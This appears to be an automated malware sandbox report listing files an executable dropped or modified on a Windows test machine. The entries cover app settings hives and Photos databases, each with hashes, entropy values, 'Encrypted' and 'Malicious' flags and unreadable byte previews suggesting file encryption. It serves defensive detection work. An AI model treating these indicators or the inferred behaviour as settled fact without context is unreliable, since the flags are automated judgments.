                  Preview:regf.._y%|We:.N...>....p.}..=...^..%.;.x.......P.j........C..S5>..8..%....F...<........{.l.l..5....<..d.A.sJ49...d.`...n.........aJ.?KM]..6..co...,.&...aN.V......0S.Q. .3.....6.t..d..~=.G.I.b9g.T.wtT.5.+.:$......W..r|UQ....X...@Er0~"jSa.|#.eT.Q.......M..R.K.;.A.^.....31J.+M.Ns.@.8.J.z.[g.d.N^..U........q...q......T.|X.3.<...p....nf.g...*..0....c...]V.d..9d..#./..#..R...8...v.X4...{.,..p......2..=....H.O..B.T....e9..N8..i.>{....... u.$.r..........*......b..V...X..Ha.$q...[....k...(.6|..W.-Tk..=D..'..;.EL.....P....v..~T........R).X.'.e!G]f..o..3..H.3$..F.hp.....]..Q6...4~......p].....C1...`.c"..K....j.$..^/..............i.YT.......2.._...J....&...xL.]....}..wY7......O2.....y7.A..X.#......(...4..jr..lSKa......q...i.....{..G?.o.....;..;]....xO.....p....8.k$..N.`@CR.H..."W^1.[!.J....V.....3)...."`.,.v%.2jM..?.y..Gq3~.k..%.%c(.g....@.....Q...<...4.o..I".n.y.,.4...F....7:AV./..a.O$..v.x..%.l.(.....].^..Y`...Q.d.Q.C..eo....WC...J..

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979872742335128
                  Encrypted:false
                  SSDEEP:192:Mwf1cxVqtepG/UU7ZvfwzCT6+t7C7uPSD3bsOEFfr:7fVpUOZJO+E70i3qr
                  MD5:046C6E5E41D38029D18382B028934D8D
                  SHA1:1FE065D1A1A297BC975D7440ADAA8B454D63B558
                  SHA-256:8A42B14519435DCC41F6C65E7509B653A96E26D3BC751A02E753DCC052AC0633
                  SHA-512:A8CD81734E4DF48049AE3293076292BBD793C25B135AC8DCB729AD9AE974F02F241C7FEFC3D9FDF65C608B20C6AF7398FB1637FA75E66A3F989F438A5C436BAF
                  Malicious:false
                  Preview:regf..!....)....-3^.o./..B.NMz..k.y$.c....I.N5o..6..2.5...... ....b...@../]}....mIW]..R..-,.+t7J..*.QZOW.)kmj.Rd..Q...Y.,.!.....t|..5.".4./.i!...'....ka*.z..l.....A...n....!IB@[.5..^.U..:1/HGFn.f...>..S).H:.Q...V.5r...F..3.2.3.Ey&.k....ME..bQ.......Q.q..L....m.....#w..R<..;.6....fP..%.W...`..A.H.H.......f ..4..\./..x.p|..1..=3.._.2..]...(I..("....kN|.F....[...;.N...S.3.&..SSZY.......{..:.........vN.K....&7Ep..e....:.<?..m.....TR...f.X....<.......r.9.....`!.....Mc.5....E.M/."..`K.#Kk1l].......]N.....,.v...m..\..&.*v_Gq....^"..n,...C...3E..j.*.-.V5n_..1.8J.........>/.eTr1/v.8...;..7....e......z.(<.....Yu...b.......R..y.N..h.|.....krI"t...-`....).=.Fb....=.X.....f.....u:/..:....Y.g.?..%..F..>.."...4..U..u.@.z....+:..G..c.hI.mp.VY.h..=.4...8..'.....8..).{.l4I.0.........?.F..T..*}%..&...2R.1-(..Zb..=e..88..G.....9....O..P......../....*p..b~..@}..T^..,.>...FA4.h....a..P.}3..+(%..:....Y....a. ~..\...8[1..xI..T.@8.&^.......=...._......5.b..S.

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977733253002105
                  Encrypted:false
                  SSDEEP:192:EHS95M/QndyDhEC9X++LfthQve+kUoLRwjoX6HSPUItNoLu0Sf32ZuUoi0K:EHS95gksKCtnOv3kUoLWhco7SfBtK
                  MD5:EE64E69509EF8ED912F99E5028361A76
                  SHA1:314D4F7EC5FEA6C26C67BE086CD0635D0F16DA0E
                  SHA-256:A85A314E292D6A526649AAFB203C11B71FE66D62A15CCE87F4BA6685234C9403
                  SHA-512:5E65D4CD7AB3191327C442176CB9C0141BDB993EABAEF11DF4D85CAC2C345C90D638CC3A222F74482F9521BA964B12238E2595B684EC4ECC14B4F73E44055B35
                  Malicious:false
                  Preview:regf..e...16..t.T.~...w|....c..0Q7...Z,.J:.;....".......L.u........}... ...N....{#.x[.{.t.t.... e.E...+...L.........\..k7.7.!.x..O#..F...........8......`.."(.....A.....t)..`.9......K.B....'$.....qLCxO...o<.....Q.4$zN..r....3....*.K.....Nd|.4..D.K......3O.|.4...d....7\.sp........dD...j=r.z.[H.e.8...S.....Z...].JL.M.jZ.2.r......H...$!..N...W.Z..w........o.9......T.:....n.B)9..3B...g.#.K.P.....Y..=}h..d..;.}h...2.r^..n.K.1.a{....]q.N5g..R.B..2o...o..w..At..]_T......s..=.j.M...E.7.....6.......W..T....w..x?N|.U.7?.y..~(..CX..w+.1..}.X..}p..=......M...M..c3^(.....n?.E.....Nx`g+C.....w..^..Oh.Z+..x .5.Ih.....1...3.^3.1...xy.|...-`.$....oudk..R.K.?.#......I,..^.].c0..V....g.8..V..~.._..x&@...(.t..M........@....G...&.|.....D{...=.U...8c.Q.+..t|...$Ag:...;LB..A+.S=.2B....(.S.b.D...}.........oq...D...rk....a.fa.>.j.J.R.."..C(...l!.Ox..c.!.....Y{..R....U....AQV...:).tV...2.7....m.#..S..N'Z...s..-.......1.....B.+.lI.4...j>..i.V2.........Xd....N..

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):131406
                  Entropy (8bit):7.99867500041791
                  Encrypted:true
                  SSDEEP:3072:k69bfCGAXJkqbCVUC7pAYTRySG5wP5M8f/IG07AkK:Fz1ACqQAYdysP5Mgx0pK
                  MD5:3AA2A509E27127D9164ED0CC52985841
                  SHA1:C847441CA7E95F9D8EB4CCA48F9985EC881923FD
                  SHA-256:F044591CDAE430A1BABC744E34F3ABAF00032A53C9EB1E56A783A62BBFFA0FDF
                  SHA-512:E03A00C02DBF2BDF318E6062C58DA93ADB9C4EEBAB59ADC9B0F96162EF608CF96A01D69B7855D9F76C40F85D50C71AE599CB6C012CDD92E1A9CB38BECCC1E825
                  Malicious:true
                  Preview:regf...)..<.....=D..c_9.k..f..0.@....w..E..W...yu....C.....8....A6..%8....1+;.eU@R.(....D...Y....X....\Y......).I9i.~.'E..UD..Fn>......Q.<.1...|OH).....'.o#..L.Nk.V........&?N..q.....M.._.wx.....y'.x..yWS...$>.&.rA...U..Y....`*,.O..NSR..A...|..<.4..(Q.....v.i..XC...z?.....^0G[....]}.r..."D.k$...?...5.U.v...73YI.A.er.......P.|..w..L.HVU.G...|d._..B.).%!.W/V.......s...U.......W.]5o.....wt.Z.#7......,t]..f..<.u.5..0....Z..G...!.2.7OP......uK.O......[E.....obBO..d....VCv.p<..b;..R..Y.!...X(....NhC5.w...K?N}.<RW..X........`j.....e......&.r.a.!...zV.:.k...<.F.h..Kv._........o.......ft..&{...Q%x....h..L.q.b8Z........]Z.*...n..-:'......|..N.1..~...\..r...n..M...w8./......a..&..(.0_9u...0...,.,..l.K.|A+`.}ZaX.....%.$*......s.L;t...#....o.B...d.=1.u{...v...jJae..U.h.!.......6.rWf3z[D......<....".9a.. .V].O.Sn...|s.._.........[...M.ap....T.&......<..`..T..%.....>R&..=..8.`x..[....{.......H.........8j~.0.D.....3y.2.\WR183...w..gOD.?\.6+:..93

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):82254
                  Entropy (8bit):7.997761007961143
                  Encrypted:true
                  SSDEEP:1536:p5KXn1XvyBv54xZZLjbolra2hZnEIr8hOebPkyrWMzC0ennmkW17Z43E9Wv9xlmv:KFvyT4vZ3coCrrk1PCjmkUZvWv9xluJ
                  MD5:2A01EA245C6775B5035FE07F2FDCA5E8
                  SHA1:9A7DB591F5969CCDA5DE2AE3D2408151A71560CD
                  SHA-256:4516A967E95E3849741CF055B669D2CBE3247AD9263247FE3945A365AB5EA927
                  SHA-512:88DA7F0B6247AB2031BD63356994E7063E2CF55D77658E8B4C7D0B2DB080EE28E5953F560A1C54C6341FCD2C7A5AF9EA0589B8727FA46B83288E339BF3C7BFCB
                  Malicious:true
                  Preview:regf.......&_........D5.....F...d]..Il.8g...cl....x$|.;h......./f..6.4"x.*j.(...~!..d.....]*Fc....5...0..`h......Z...H.T.W..j"#G.7'...aw....#....'...yk.?....*.T+(...#.+.Q.0+s.Y...<.......@.P.':m<..to.....6?.-Z".@...pF.d.-O..D.%.'.U.3...s....`....@........S.g.G.8R...js*.PE...\.u..2...6I.......={.......aK".-.T....i.q.........?S..Z.%XV-..WEn..x\.&...G......bU..n.....HW.#.f..,.yn......U?...F`.t..N.z..K_.. ZJ..*28.h...y.|/........2.kB}.D....c...Z..G....sO. 1.:L.j.......gl`...M....#.M...tQ.g.d.f.....n...q..$wPPK.tu1.P..=.zZ..$~.j.u."_.........0qT..9.J.k?(:A.1%...%$....).=....A..f(..+....t.:.j7.....=..7_...-.\..B..t.{.S.xDwi...V..e2........-....X.....|..f_...j.....@M.X..1..T..!.A..oc.e..~e..iS...9...W...{@Y@.ZJD..&..n.Z.3.K..6.......U.e,.....y..'.{1....8^/.Y..}..3....|.w{9.K;.... .x..^GUF.`e.y4fx0.R!p`..P....!d.{...]Vf.xz9..W.F....t..0. |...D...'aj...T...Q`.6.J..0...H....M.n;......k..r.;..N..n-.-....{.......Y....f.j...pC..{C..HM..:...h.g.C<....

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):41294
                  Entropy (8bit):7.995649793206726
                  Encrypted:true
                  SSDEEP:768:CxE+MjfXYqIcV8piDkfMZ9SqyzAqToQIdV2mhf8kRGRd84QHO//+UviEeBuap:YobIvYsgb9SqbqzMUZd//+UviEWZp
                  MD5:B2363D084F5036F8149BF4C24E615A29
                  SHA1:3297B6FAE2014141910278EA6956387979932525
                  SHA-256:C209D81134B33FBF3B9E7ADDB4C912F0717BA624CCC689C2B763AE733070B5CB
                  SHA-512:9F134B324CEC93232F6B49018E6565E604D2BE354A09D5E2824E177E9E2BB9A8870BEF22D1122321ED5ABA504E2D65A754FDDBC889805D5953BE09C8CFCE6B0B
                  Malicious:true
                  Preview:regf.r.t.?.Z.%.$u0..~x..^...xq.T...D.~...6V.`.E.2..Qj.M.ae#S.W.ski.V.2.&...t...!.f2".Y....0..Q.9E...[.U....U.4.@:.9..v..R.M....._:A..a..V......7..T7...E..s=.Z...}8&O.........Z.........hw..n...^U5:..u..).....P....e.Pu....!L.....=*.....m.$......r.).uN"'...!..T.e.3..k..;.!Q......).O7..UU....4...../..5..9|....9.....v...4...w8....'o..P.-i.V.,j&...2...w..bg.|n..........J...P...........zF...k.TM........z 4.....8..Z..D..>....{./.J..7d.SK.".t(C......1y.Q....8..X.E.VM.u...S>..B.cc..._%l...kB.<wL...A}i...p..{.ql..~Q....l/.../..).C...8.=,..l.F.....]..,....~*.A...^i.d].a..fUQe..u.q.h....;.=.H..........1.T......eVg.*..<...m.@..l.O-...'.....K.X#}.l.k!.G*!..(.b..z%.h.@44.6....../.5.H..m.9O`.N........n.=...9....G..q..Q.X.5.L.x....'..;$...5@.\...Tr.....e.aB.{<...}.T...|.....j.n..qrFH..(@........q_.(Fs.+..Q.Q......=1A............Y...'K.wR.L....Sg...BlL.....*_.V...#y0......e..c.^#...{kg:j[...1\.0..+.T..1..q.j'&];n../.XK.d.....eo^D.B.|.).....&;#.?.M...."......

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9809985593036865
                  Encrypted:false
                  SSDEEP:192:aPBOg1wcJE5GMWggVoqwc2Qk2L1lSiUkL5L+BJ021anX8:aPkg15JE5VWboqeQjL1TUkL5ibInX8
                  MD5:810FB83F61908366708D892B78B9519F
                  SHA1:0D43F895D94C3255FD0D1F285BACB7406512A667
                  SHA-256:7C9B40868E12DF5D33B38DF41A21026F43C02616EF93A1712AA0A73ECB42DB2F
                  SHA-512:FFFBE3DD80B34EB3FA705547F2BDD7B97600BDC106DA3F05CC49F543FFD8C0E28861236A563265E03F4BD55F43D6C27ABA0AEFB5F7948211B3C7399217623A1A
                  Malicious:false
                  Preview:regf.."Wv.lJR.uV|..%=.ZZh.r.D..... .....gz.9U.{......}.:K..V.lHK.a.......b....uy..W.c.~. ..p..c[.d7.s....1.".A.*"..H......@...."G...%..~h..v.q..6.../z.L...O..b .k..,v'#.&O.d..Q.H.........2I..l[....A.nfq6..K.1.b.6.TP..=..c.R.F.I....Hm....sf.r..e;k.*.CJ-Ae.......X...v.../".[.<..HM...B.c.M..1./..K?....LT.F.o.Y..!x.~.^..i..,.iP.D.....s..tQ.'......R...?._s..i;.d..j.-H.od..S...-...Ya......Oi.}.o.*..CHT.T..]nd.$..e.Q.K...].<.|..w..`\A.`.K..0v...W......D.a..%2^....k....<.3'.hy~(.#N...3.8)c...>.\J1l..f{..x.%......lz>...G..Xz...ev.P;..5wO .N.n.B..8r.5... e2PG#..)...).z.=W.....6.E.R..s.;...x....6..#....p.....-..8....RvG.y.......t......Z....,s...--s....{.......C$)...h.38<2.. ..JP?...^..8..2XFBGC..O.....9..:o.....7...M..^.n.I..~..,...2.... .|lWp/`..#....._...C^..})..0......AH..L.,bK.........?/wz....~..).u..I..d. ..s.....#..A..tRe.L..8ii..I..........hpwn..~..99Rf....}..l.Zp.wx....p<.t.U6o0 ...Lj..A.[j..~..//.t$5l.A.a.x..-|e}..X2.....8}.n..

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977186677467208
                  Encrypted:false
                  SSDEEP:192:sWM00A+kU6ZAkvlqMONDzV3g6WlIaL5MHlNOayq:sWM09+oZAOEtzVw6WlZYn3
                  MD5:F40263CB13B15E9EEF1D9A804CDDD27A
                  SHA1:05F353320F718E854267A91F4EDC10F7659EB783
                  SHA-256:22B6201E2714C119BEE25054F3B204EFCB4EEC3D6B583F02F7233D2A8576A199
                  SHA-512:FF9EC18E1F58B8250BAD196003C86527998709867FF52631B74B6D20669B01F7AB50F7DFFC810C2C7D406DAFF520A5331E582E10255FDAF904D0E41B3F35F5E2
                  Malicious:false
                  Preview:regf..s..`..Cfz.d...f.Wy..T.*.."]...{......./E4.hDRC.U.3.L+.G#.(.j`.....;....H. ....&8.j...{p..v........6.....f....D.$._.q.qR..i...5v..a.q.^.&w.Y..k..H...V.r>.j.!.../..5......v.H.f.f...EO... .|..!i.Im.1>..|. .G.#.."..k.........T.ay.^.B...= .q.....~'q..<!]....D...u.b../.Z.k.._.jx........C.X..i_.y.Z9TF/.+]...v l...8.0t..[U.;...v.vg...5...:.......z..S..!....a.ge.|rt.HY{.P.......K..e..^..0(..po.P...........D......)...co..v-9..x+..B.{fE?Y.........QA......4..&...N. D.d.v..(8...,...l.6..~i%0..jq../.2...$.......o.j.X..PD.WMi J.....D...]..0..pHe.......Z.C.=.."..y-..).f..........:..M&-ph.A-..c...q.....V..s.....e.....|..`...K}.]...p.>..Z..g...L....._...D.......<hR=...:.a..d|.....G D}X.c.^....7.m+0.X....h.?!...Y.F.....:.S...........[...\..#.. .k.VgQ......H....e..e..;/l.9.q...kE.I.x_U....#m..$...1(0..&..c ..%=...u,.V.ab.5....Q...A....p..D..U...X...X....4.i._:........|...L...-`...V.o.N.Q..T...U.M.|CW...e..;....]..?vtl8..c.q.I.@...;.!._X..Dc....K\.n.

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9771665837957375
                  Encrypted:false
                  SSDEEP:192:hDrWMDfdOVZDs/uajnwopNkZjdtGa0RMzhH:xrWG2MumnwljEMFH
                  MD5:E1C36B29A7E9F61236D01C06DB1621B0
                  SHA1:DA482C47B9AB508FBC2BB5BED1FFF055486F4507
                  SHA-256:243FFBD2492418A17D1713E156FD65D67B3498BF083D7541DAE8AB63CF69FAF5
                  SHA-512:86E311E13D36D6E1E84178F8E7DBD6698FFD6D9E30AC1832AC1E037760214BBC5D82B993DBC8314E6AD0E0DB32885A811A8D83AC2E18F7FE6EC59BC64971A85B
                  Malicious:false
                  Preview:regf.2.#.RNax.R&|..Q..S...@.........nxpM.[*......6..R.W..3.1...E.SD....3[...[p]....O&hX.g....j.!.)...?.,kAml....X..Yj.j.....tK9D*.$./...=j<..t.N..{U....<(.*..i.sp.%L..z. .,)B......C.4..Y&..>K.\.....}....p..M...Ks..sG"e.,.W.2'.u.n/..C...J.}.c0..dm.z..8.....o...X<p.cH...a...|.'.$.R....I.k...h."bY.b.N.H...c...q...3F.D...7.k...8.3...Y...W...+JXP...5..)\.%.e...eqG.5b5.L.P..M. M]N..w}...t....d*..l.QS.g...u...}K.....ATM..b..j.A.>...9k.o...Z..$..............\w...S.43.N\....k..(Q>c..>..2V..%i W:..:..............g..fx...w.7..O.:B..._/13'Qk..5..Zc..%.....1.q.W.5..>.&....L5e........>Y;-..;Zn..bL...*8m...?b.......T\.R..$.Z'?W ............X.e._HZp.H?_j..e.b....m*..,....'wR.6X..3g.....5.I)..k6O..=..H../;..-.j....o......o'.S.o.z0km_..pb[...CCF..&.........\.W.3..R.....N.D..=D...4.?..... .....5&w............t.#.....N.j$7U..h.n.k/.....L.../.u9!....I....h..#.ZX..:.w....S..`\.:s.v..<...p.|7.....\..:..CYU=/3...&C.pOo.t...j.Jh.|.+..P....`p.0.1...1....P...j..D(.Q.>

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.976619663241203
                  Encrypted:false
                  SSDEEP:192:OSeZFo6KB6KkG/Gq47NzxriKjt+SHgMUnlesk/HDlJVH:OSb6l3Geq4lEkttH3/H3R
                  MD5:A756ED786579C63C16F9B8E03A67524E
                  SHA1:19BE267994B70AB0D3EF52F2B1725B149F8C2565
                  SHA-256:F81B8EA88C7D7AB362C13DEC5E8A4E14D85FF58AF4E20C54AB0FE1B877F3F994
                  SHA-512:91E1D37DF99A55B120B906C35CAFE3FD3234BC6E412AB27C026B3CB1A8F814F13A9935300ADE9E8E889FDF8F848D40C1843C02651FE0818C84C32FB9360B99D9
                  Malicious:false
                  Preview:regf.L..Q.Q.xF..y..i.+4...H....Q.v..W."v.?..E.$w<dd8.g...ey.:....H..*../...t.....R.........C/.d......\a.G.qB.%..#......H..;.7.V..r.w.'?.>.t3...2a..p6p.....wvs.v`....xKU...K+.H....C...=O.0%...x.rfb...%.^.....d..>u....l..O..*...e.....".P...vZ&}3X...A.......]{._...'!a."{..dS..GAJ\6'.Os..i.D.....?.qK.,bt...O.N.1\.. ..y.......n{.D=P..h.....{..j.b...X...t}Y].`.H.y{.J..{(p....z..RF?;.X..@?....w5X,...[./.c.,?.)..l5_"..E.Sa]0y#HG../..)...f.h.duCjz.....M.G...(s..T..J...ux..q....~/...s......%....A..aZ.*...B....>..l>..c..7.D2..S...t.....).!.P..4.W...h..j-Y\=..*.z.!.@.J.....ug..gM...4.O...<..8.!...$..}....#{.q...hX'.,mt.5.O0.O4..y[.4i...`.=..Wf./..{..r..N..pv.}|"z..{c.5.b.NQ~0G.j.6@..!<..j..t..fXT...C.........G.!@..0Z..C>f3$.0... %.c=.U..:.".......2k......{tU..U......p+l=..Av......d.+....K`z.o...bH.@.....-...k;..GlI..8e..S.MH.0r..........U$.Yj...u&v.F.{.f.](.8..]B.....~..t4.....l.Hy.".....:..<...a.......q..~.6..)..].y.....(,.Wp,p........*.jvn...'

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978171139957578
                  Encrypted:false
                  SSDEEP:192:Ykp330eG/YrPvn0+XfICIqF4lqWRpgPnjO7Qx6Ci1VH5hJ4Y5:7SedvICIg5W/4nmL77V
                  MD5:56841ABC599B945EFE31C39B8A21ED32
                  SHA1:18A70800372888103AAD54CAFE110CB11DF0BCCC
                  SHA-256:84ED88473E39CC777EAD7EFEF558B0C6988D8FBBB70FD417704C472AC1425DE2
                  SHA-512:0FA0F79A6DB766C544D20F94DD0B13ECB3DA259A95D4930A53EC234F8902D23A65A8501B49B28FDCA8EA85EB266941D20915EF7548FD5AE1CCDF1D8E1A448145
                  Malicious:false
                  Preview:regf.~.[m:Tq...R*^..].P..T>.......5,.4..HYV..Y.|..3.7....=c..G3".v..XYi.`...S.m.......l.^...1;.........!,..#X.-/...:.a..K@...|..&.XWqf5.......H........:.v.l..1.M.bB.g..A..KF.....f......$O$s.A..\..N.{.[.U.~....sV.]. .}wA...qU...r.nQ...xz#.xb..k..Z.`.f......3._0.\......Z..o[..(6...!.r.c.`..4..$.D.....p...4...{...z.x. ..a......a....1..-.....sk.&TER-...Y.|..5,8..D_+*....e..#fV.P.P.*...8.F.PY.c..lt}.N.F....I.U..j.7....._..$.....Z~b...^\..M6...M....M..E.>..._...[-.y9....c5..'....s..7....\u..... .<c.7..,BQ...m....n8.}.....=.U&T..Rf.n).'..Q..].....6.J..~..Q&.)3.i...3[U....c.....M3..tC`.69...bb.k3..a..^Z1.UB...(..V.<....s.BR..K}.1...t....2..m..GZ.....k...H...U"y......d...._.ql.D.IJ.`.x....+....'.E.F.0(B..6.D.......8...6m..}.SYh-!.R....a.-b.V...H.RSD;l..}.....I.l......P.0../.C..y.S.."......M.%.4.n?;..3.Ul....p..tG..v..{....}.H0Q..1z/F.,=.Y#H..Ov........./5......q...*.b..B./.=?..........\d....4 :i.%.[.{.....|..G"xBs{..f.....T..z...qQ.O|...F..L..m..G0.Q...

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4430
                  Entropy (8bit):7.960257056190783
                  Encrypted:false
                  SSDEEP:96:dD8JafRWxZ1lMdHxPzFq9Ef4CqrB1l2MVv10wqsABE:Ge85M7PIE4CqrBiMh11iC
                  MD5:39D07F5D434D071A1A0F7253EE56986B
                  SHA1:58EBAAD38745739DE13FBE16CA9A8054C982ACE1
                  SHA-256:DF052C1F098AB892E0E5021E04F8498E3267FE1627D9BDD2ADF4E9C3877CBD95
                  SHA-512:9CDC615E7000C85C9C5E136A6668461838FA5479E3A4F7E4DA207B0E9CD28485BE7EF5A5C937BCD1134A9F4A0E42FD9C399932784A15EE5387B4B0BBC077F355
                  Malicious:true
                  Preview:SQLit....;u....<S...Bl.pe. ...e|.tE..#.R.E[(f.Hh.h...}..H..0...B.9......<~........8f.4mc....Re.(."a..x.+.........x......@2....V)..lr..<S.f.3..g..W.....Y.....o..>.Z.#........-zx......I1.v....R.tK.^U......al......]z.w.X};..pP.6...i..\.'*..j5..lTi.AsAj.>!..T..5......|...>./....Xd...W.1..G(.r.h..J.u.!.4iqU..........o.1?.s........A..Jj0...Bd.0"...0B.G#....(.\o.F..Ex.a5.<.Kk...=..Fb..9(..0l..W...&..@Z..../8.+.*h.E9....k.`1.@.X..j.......+.0ZS..Y.......h.#.N.....&.....|...m....\ ......'....5...gNf.D...V..T.`..f..........?j.t.....{".h.1..........u...b....&..g....kD..........O...._.p......6....0t....,9.n.%r?..:*.M...Aw.....-.Z4L......l.80.....-....,D.Aw.,....G.Yf.+..mU`.#...k[...%.w.L.2A......z.K.....n./D \.O.....B.0:8.\...u...V.L.x...8..J^2'......at..7......H]........./R......-..-t..[.._.E...b...Y....)....Lr.f...F.n.6'qX..;y[(D.s..../...Z...A......d.......".....aq\...;.j.t9...........C.{...VT.\0..[Mf.?......P.............8.A.~[{.,%...i...8...A.

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):33102
                  Entropy (8bit):7.99491483910942
                  Encrypted:true
                  SSDEEP:768:no5qsolzzbOqrOZLReE7CdQn+JQ4vSj39ndevK:Nl6MOZ0E7Cdq+vvK39dkK
                  MD5:553D1AA4F3EAADF3CE23B1769A26EAE6
                  SHA1:3781497C9FCE1174AB949414B2F198F9A805CD8A
                  SHA-256:0641431CBFA22A8C4EE991BE7FDBA310F610A7B64624617415108AD25FBDBB95
                  SHA-512:1E18E8F071DA93E3EFF14FDDD8B11275D3FC02ED4534276258A4631B6536050D452894BCA5D99684D530318C1F080E97D1ECE8B80E3D1DA0041DA9A545C7E1B3
                  Malicious:true
                  Preview:..-..+.\.v..7.*..9..8WFM.Gp.Yffk..w..B#x.4..C`V...m..lu.....;......C..7q....P.q.C.....o..0|.1..\t*.........~...0......t..^..O....F."..<.a..`....[k,.6.......p_!5`R..^+.+.4....6] ._.W ...i......IS ....q.\..[.A....*f.Ac!.s1....v.%.c.!..&.r7.#.<t.~(.C./...m.....Yl.*.I.......LP*)_<.d9...^...=..7W...~C.*..n..cw\J.@.e.}...>..{....\.......!.[0.V.....q.O..t.._u..y1PvT......P.....&.n.'...U.P..O......e.......y.....$.w^.....j.,.....8.3...6.i..I.......'..x"GC..B.k.z....J....a}..F1....\..Z.=..K|..X.Pg......cB.0VC.|^...X.q....R)..4.Xz...1...Hc?.h....L.EH..Z........A...\........M1.%.v8...2w.6_..Er.s-}......y$-.e"A...e.<a?.b..]..sK..&..)Q.T...<.!.gv.....,.A.t...b..,...j..F.a.`.....P...V..d..H..C4.....V>XE........u.]...l._.3q....Jxh.b...sQ..&-...F^....Wa.o.l...(......7%...a..2...C!7.D$...y.^..T..oJ....3..f.c......w_..q.7k....Zc1....m.u.....6$.V.....l..^..........U. ..d.G6...e..B}...B.>...T...g.=.#.e.~O..........E.q>.6.T.1.bK.Sp.,A.f.?+Ae.......

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:SQLite Write-Ahead Log, version 13793605
                  Category:dropped
                  Size (bytes):1347606
                  Entropy (8bit):1.981399703764243
                  Encrypted:false
                  SSDEEP:3072:3PIFyi1LwdTRu5m8TQkJJEbuXkjaz4nNNl6NIuY2aUAa7FXOZYzlwOuY5h+olR9H:tuwVWm8TQe2E4JAI72TAKF6YJb7r
                  MD5:9A326B2343AC413E670721B702ECDA5C
                  SHA1:9ACAF12FCD9E797C056D8929F42933321B2E4B59
                  SHA-256:8E1DA70DEF8B56557A91F4A78E1BA389C2F8691CF9B952C16D0996ECA7219FBA
                  SHA-512:2A535A5442CCED3BCDEEF7A7D5156A3DC4D82A09CEE325870AA161DB55B3B4DD32F104A7E218EA54C2A1CECCD88E2C8DD84C5CF22872E7E26FAE66F343D61284
                  Malicious:false
